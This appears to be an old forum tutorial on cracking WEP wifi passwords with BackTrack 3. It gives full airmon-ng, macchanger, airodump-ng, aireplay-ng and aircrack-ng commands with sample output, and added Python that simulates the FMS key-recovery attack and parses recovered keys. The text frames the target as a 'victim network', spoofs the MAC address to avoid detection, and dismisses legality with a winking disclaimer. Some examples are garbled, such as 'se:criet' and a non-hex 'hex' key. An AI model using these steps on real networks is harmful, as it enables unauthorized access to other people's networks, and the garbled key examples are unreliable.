Hacking WEP wifi passwords 


1. Getting the right tools 

Download BackTrack 3. It can be found here: 

http://www.remote-exploit.org/backtrack_download.html 

The BackTrack 4 beta is out, but until it is fully tested (especially if you are a noob) I 
would get the BT3 setup. The rest of this guide assumes you downloaded BT3. I downloaded 
the CD iso and burned it to a CD. Insert your BT3 CD/USB drive and reboot your computer 
into BT3. I always load the 3rd boot option from the boot menu (VESA/KDE). You only have a 
few seconds before it auto-boots into the 1st option, so be ready. For me the 1st option 
boots too slowly or not at all, so I always boot from the 2nd or 3rd. Experiment to see 
what works best for you. 

2. Preparing the victim network for attack 

Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" 
window. Now we must prep your wireless card. 

Type: 

airmon-ng 

You will see the name of your wireless card. (Mine is named "ath0", with a zero at the 
end. That is the madwifi driver's name for an Atheros card, and the "wifi0" used below is 
the physical device behind it; other drivers show names like "wlan0".) From here on out, 
replace "ath0" and "wifi0" with the names airmon-ng shows for your card. 

Now type: 

airmon-ng stop ath0 

then type: 

ifconfig wifi0 down 

then: 

macchanger --mac 00:11:22:33:44:55 wifi0 

then: 

airmon-ng start wifi0 

What these steps did was to spoof (fake) your MAC address so that, just in case 
your computer is noticed by someone while you are breaking in, they will not see your 
REAL MAC address. The value 00:11:22:33:44:55 is arbitrary, but remember whatever you 
used: the aireplay-ng commands later in this guide pass the same address with -h, and 
the attack will not work if the two do not match. Moving on... 

Now it's time to discover some networks to break into. 

Type: 

airodump-ng ath0 

Now you will see a list of wireless networks start to populate. Some will have a better 
signal than others, and it is a good idea to pick one that has a decent signal; otherwise 
it will take forever to crack or you may not be able to crack it at all. 

Once you see the network that you want to crack, do this: 


hold down ctrl and tap c 


This will stop airodump from populating networks and will freeze the screen so that 
you can see the info that you need. 


**Now from here on out, when I tell you to type a command, you need to replace 
whatever is in parentheses with the value I tell you to take from your screen. For 
example, if I say to type: 

-c (channel) 

then don't actually type in 

-c (channel) 

Instead, replace that with whatever the channel number is... so, for example, you would 
type: 

-c 6 

Can't be much clearer than that... let's continue... 


Now find the network that you want to crack and MAKE SURE that the ENC column for 
that network says WEP. If it says WPA or any variation of WPA then move on... you can 
still crack WPA with BackTrack and some other tools, but it is a whole other ball game 
(a dictionary attack on a captured handshake, not the statistical attack described here) 
and you need to master WEP first. 
The channel number will be under the heading "CH", and the access point's MAC address 
under the heading "BSSID"; you need both for the next command. 

Now, in the same Konsole window, type: 

airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0 

The FILE NAME can be whatever you want. This is simply the prefix of the file where 
airodump is going to store the packets you capture so that you can crack them later. You 
don't even put in an extension... just pick a word that you will remember. I usually make 
mine "wepkey" because I can always remember it. airodump-ng adds a counter and the 
extension itself, so the capture ends up in a file called wepkey-01.cap. 

** Side Note: if you capture more than one network in the same session, use a different 
file name for each one. If you reuse a prefix, airodump-ng just bumps the counter 
(wepkey-02.cap, wepkey-03.cap, ...) and you have to remember to point aircrack at the 
right file. I usually just name them wepkey1, wepkey2, etc. 


Once you typed in that last command, the airodump screen will change and start to 
show your computer gathering packets. You will also see a column headed "IV" (newer 
airodump-ng builds label it "#Data") with a number underneath it. IV stands for 
"Initialization Vector": WEP sends a 24-bit IV in the clear with every encrypted packet 
and uses IV+key as the RC4 key for that packet, and because every packet also starts with 
a known header byte, each captured packet leaks one byte of keystream for a known IV. 
aircrack-ng recovers the key statistically from many such (IV, keystream byte) pairs, so 
in noob terms each IV is "a packet that contains a clue to the password." Once you gain a 
minimum of 5,000 of these IVs, you can try to crack the password. 

I've cracked some right at 5,000 and others have taken over 60,000. It depends mostly on 
whether the network uses a 40-bit or a 104-bit key and on how the statistics fall for that 
particular key; it is not a guessing attack, so a "hard" password does not help the owner. 

Now you are thinking, "I'm screwed because my IVs are going up really slowly." Well, 
don't worry; now we are going to trick the router into giving us HUNDREDS of IVs 
per second. 


3. Actually cracking the WEP password 

Now leave this Konsole window up and running and open up a 2nd Konsole window. In 
this one type: 

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0 

(-1 0 is a fake authentication with no re-authentication delay, -a is the access point's 
BSSID, and -h must be the MAC address you set with macchanger earlier, because the access 
point only accepts injected packets from a station that has associated with it.) A 
successful run looks like this (transcribed from the original screenshot; the BSSID is the 
one from that session): 

# aireplay-ng -1 0 -a 00:1c:f0:fb:ab:5a -h 00:11:22:33:44:55 ath0 
Waiting for beacon frame (BSSID: 00:1C:F0:FB:AB:5A) on channel 6 
Sending Authentication Request (Open System) [ACK] 
Authentication successful 
Sending Association Request 
Association successful :-) (AID: 1) 

If you never get "Association successful", the access point is probably filtering MAC 
addresses (set your MAC to that of a client you can see in airodump and try again) or is 
using shared key authentication (see the note at the end of this tut). 

Then, in the same window, start the ARP request replay attack: 

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0 

# aireplay-ng -3 -b 00:1c:f0:fb:ab:5a -h 00:11:22:33:44:55 ath0 
20:54:16  Waiting for beacon frame (BSSID: 00:1C:F0:FB:AB:5A) on channel 6 
Saving ARP requests in replay_arp-0218-205416.cap 
You should also start airodump-ng to capture replies. 
Read 1307 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps) 

This will generate a bunch of text and then you will see a line where your computer is 
reading packets and waiting on ARP requests and ACKs. ARP requests are used because 
their size and contents are predictable, so aireplay can recognise them and replay them 
without knowing the key, and the access point answers every replayed copy with a freshly 
encrypted packet carrying a new IV. These are your meal tickets. Now you just sit and 
wait. Once your computer finally captures an ARP request, it will send it back to the 
router over and over and the ARP and ACK counts will climb by hundreds per second. 
Sometimes this starts within seconds... sometimes you have to wait a few minutes, because 
a client on the network has to send an ARP request first. A network with no clients will 
sit at 0 for good (aireplay-ng has other attacks for that case, such as -0 deauthentication 
to make a reconnecting client send one, but they are not covered here). Just be patient. 
When it finally does happen, switch back to your first Konsole window and you should see 
the number underneath IV starting to rise rapidly. This is great! It means you are almost 
finished! When this number reaches AT LEAST 5,000 then you can start your password crack. 
It will probably take more than this, but I always start my password cracking at 5,000 
just in case it is a short (40-bit) key. 


Now you need to open up a 3rd and final Konsole window. This will be where we 
actually crack the password. Type: 

aircrack-ng -b (bssid) (filename)-01.cap 

Remember the filename you made up earlier? Mine was "wepkey". Don't put a space 
between it and -01.cap here (that is a zero, not the letter O). Type it as you see it, so 
for me I would type 

wepkey-01.cap 

Once you have done this you will see aircrack fire up and begin to crack the password. 
Typically you have to wait for more like 10,000 to 20,000 IVs before it will crack. If 
this is the case, aircrack will test what you've got so far and then say something like 
"Failed. Next try with 10000 IVs." DON'T DO ANYTHING! It will stay running... it is just 
letting you know that it is waiting until more IVs are gathered. aircrack keeps reading 
the growing capture file that airodump is writing, so once you pass the 10,000 mark it 
will automatically fire up again and try to crack it. If this fails it will say "Next try 
with 15000 IVs", and so on, until it finally gets it. 
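To make concrete why aircrack wants thousands of IVs and why it keeps retrying as the count grows, here is an added example (my own code, not from this tutorial and not from aircrack-ng) that simulates a 40-bit WEP network and recovers its key with the original Fluhrer-Mantin-Shamir statistical attack. Everything in it is constructed: the key, the plaintext, and an IV sequence made only of FMS "weak" IVs, which is why 1,280 frames suffice here while a real capture needs far more. The votes in fms_votes are the "clues" each IV contributes; the branching search in recover_key is the idea behind aircrack-ng's fudge factor (-f), and the ICV check is how a candidate key is confirmed instead of trusted. aircrack-ng's default PTW attack is a different, stronger statistic with the same overall shape.

```python
"""Simulated FMS key recovery against WEP-40. Added example; all frames are constructed."""
import struct
import zlib

SNAP_FIRST_BYTE = 0xAA  # every WEP data frame starts with an LLC/SNAP header (AA AA 03 ...)
# Constructed plaintext: LLC/SNAP header announcing ARP, followed by a dummy body.
SAMPLE_PAYLOAD = bytes.fromhex("aaaa030000000806") + b"arp-body"


def rc4_ksa(key):
    """RC4 key scheduling: returns the 256-byte state permutation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_stream(key, n):
    """First n bytes of RC4 keystream (PRGA)."""
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key, iv, payload):
    """WEP: per-frame RC4 key is IV || key, the 3-byte IV travels in the clear, and a
    CRC-32 'ICV' is appended to the payload before encryption."""
    body = payload + struct.pack("<I", zlib.crc32(payload))
    ks = rc4_stream(iv + key, len(body))
    return iv + bytes(a ^ b for a, b in zip(body, ks))


def wep_check(key, frame):
    """Decrypt with a candidate key and test the ICV: this is how a recovered key is
    confirmed rather than trusted on the statistics alone."""
    iv, ct = frame[:3], frame[3:]
    body = bytes(a ^ b for a, b in zip(ct, rc4_stream(iv + key, len(ct))))
    return struct.unpack("<I", body[-4:])[0] == zlib.crc32(body[:-4])


def simulate_capture(key):
    """Constructed capture: one frame per classic FMS weak IV of the form (A+3, 0xFF, X).
    A real access point chooses IVs its own way, so a real attack needs many more frames."""
    return [wep_encrypt(key, bytes([a + 3, 0xFF, x]), SAMPLE_PAYLOAD)
            for a in range(len(key)) for x in range(256)]


def fms_votes(frames, known):
    """FMS vote for the key byte that follows the known prefix. The plaintext starts with
    0xAA, so the first keystream byte of every frame is known: ciphertext[0] ^ 0xAA."""
    a = len(known)
    votes = [0] * 256
    for fr in frames:
        k = list(fr[:3]) + list(known)          # IV || recovered key bytes
        first_ks = fr[3] ^ SNAP_FIRST_BYTE
        s = list(range(256))
        j = 0
        for i in range(a + 3):                  # replay the KSA as far as the key is known
            j = (j + s[i] + k[i]) & 0xFF
            s[i], s[j] = s[j], s[i]
        if s[1] < a + 3 and (s[1] + s[s[1]]) & 0xFF == a + 3:   # a "resolved" IV
            # With ~5% probability the rest of the KSA leaves these cells untouched and the
            # first keystream byte equals S[j + S[a+3] + K[a+3]]; solve that for K[a+3].
            votes[(s.index(first_ks) - j - s[a + 3]) & 0xFF] += 1
    return votes


def recover_key(frames, key_len=5, branch=6):
    """Depth-first search over the top `branch` vote-getters per byte (the idea behind
    aircrack-ng's fudge factor), accepting a full candidate only if it passes the ICV."""
    def search(prefix):
        if len(prefix) == key_len:
            return prefix if wep_check(prefix, frames[0]) else None
        votes = fms_votes(frames, prefix)
        for cand in sorted(range(256), key=lambda b: -votes[b])[:branch]:
            found = search(prefix + bytes([cand]))
            if found is not None:
                return found
        return None
    return search(b"")


if __name__ == "__main__":
    key = b"seven"                               # constructed 40-bit (5-byte ASCII) WEP key
    print(recover_key(simulate_capture(key)))    # b'seven'
```

With more frames per key byte the correct candidate's lead over the noise grows, which is exactly what aircrack is waiting for when it says it will retry at the next IV count; with too few, the right byte may only be second or third in the vote, and the branching search is what still finds it.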


(Screenshot from the original: the 3rd Konsole window running Aircrack-ng 1.0 rc1 r1085.) 
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If you do everything correctly up to this point, before too long you will have the 
password! now if the password looks goofy, dont worry, it will still work. some 
passwords are saved in ASCII format, in which case, aircrack will show you exactly 
what characters they typed in for their password. Sometimes, though, the password 
is saved in HEX format in which case the computer will show you the HEX encryption 
of the password. It doesn't matter either way, because you can type in either one 
and it will connect you to the network. 


Take note, though, that the password will always be displayed in aircrack with a colon 
after every 2 characters. So for instance if the password was "secret", it would be 
displayed as: 

se:criet 

This would obviously be the ASCII format. If it was a HEX encrypted password that 
was something like "OFKW9427VF" then it would still display as: 

OF:KW:94:27:VF 

Just omit the colons from the password, boot back into whatever operating system 
you use, try to connect to the network and type in the password without the colons 
and presto! You are in! 
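An added helper (mine, not from the tutorial or aircrack-ng) that turns aircrack's KEY FOUND line into the two forms described above and rejects anything that is not a legal WEP key length. The sample lines are constructed in the format aircrack-ng prints; the keys in them are made up.

```python
"""Parse aircrack-ng's recovered-key line into a usable WEP key. Added example."""
import re

# Constructed sample lines in aircrack-ng's output style; both keys are invented.
SAMPLE_ASCII = "KEY FOUND! [ 73:65:76:65:6E ] (ASCII: seven )"
SAMPLE_HEX = "KEY FOUND! [ 0F:3A:94:27:1E:B0:4C:77:D2:19:00:A5:6F ]"

KEY_RE = re.compile(r"KEY FOUND!\s*\[\s*((?:[0-9A-Fa-f]{2}:)+[0-9A-Fa-f]{2})\s*\]")


def parse_key_line(line):
    """Return (hex_key, ascii_key_or_None, bits) for an aircrack-ng KEY FOUND line.
    The hex form with the colons removed is what you type into a client's WEP key
    field; the ASCII form only exists when every key byte is printable."""
    m = KEY_RE.search(line)
    if not m:
        raise ValueError("no KEY FOUND line")
    key = bytes.fromhex(m.group(1).replace(":", ""))
    if len(key) not in (5, 13):        # WEP-40 and WEP-104 are the only legal sizes
        raise ValueError("unexpected WEP key length: %d bytes" % len(key))
    printable = all(0x20 <= b < 0x7F for b in key)
    return key.hex().upper(), key.decode("ascii") if printable else None, len(key) * 8


if __name__ == "__main__":
    print(parse_key_line(SAMPLE_ASCII))   # ('736576656E', 'seven', 40)
    print(parse_key_line(SAMPLE_HEX))     # ('0F3A94271EB04C77D21900A56F', None, 104)
```

Note that a six-character key such as "secret" is not a valid WEP key at all; the length check above catches a line like "KEY FOUND! [ 73:65:63:72:65:74 ]" instead of handing you a key no client will accept.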


It may seem like a lot to deal with if you have never done it, but after a few 
successful attempts, you will get very quick with it. If I am near a WEP encrypted 
router with a good signal, I can often crack the password in just a couple of minutes. 


I am not responsible for what you do with this information. Any malicious/illegal 
activity that you do, falls completely on you because...technically...this is just for you 
to test the security of your own network. :-) 


I will gladly answer any legitimate questions anyone has to the best of my ability. 
HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE 
WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY 
ANSWERED. No one wants to hold your hand through this...read the tut and go 
experiment until you get it right. 


There are rare occasions where someone will use WEP encryption with SKA as well 
(Shared Key Authentication). If this is the case, the open-system fake authentication 
above is refused and additional steps are needed to associate with the router: the access 
point sends a challenge that must be encrypted with the WEP key, so you first have to 
capture a real client's shared-key authentication to obtain a piece of keystream and then 
pass that keystream file to aireplay-ng's fake authentication with -y. The steps I laid out 
here will not work on their own. I've only seen this once or twice, though, so you probably 
won't run into it. If I get motivated, I may throw up a tut on how to crack this in the 
future. 


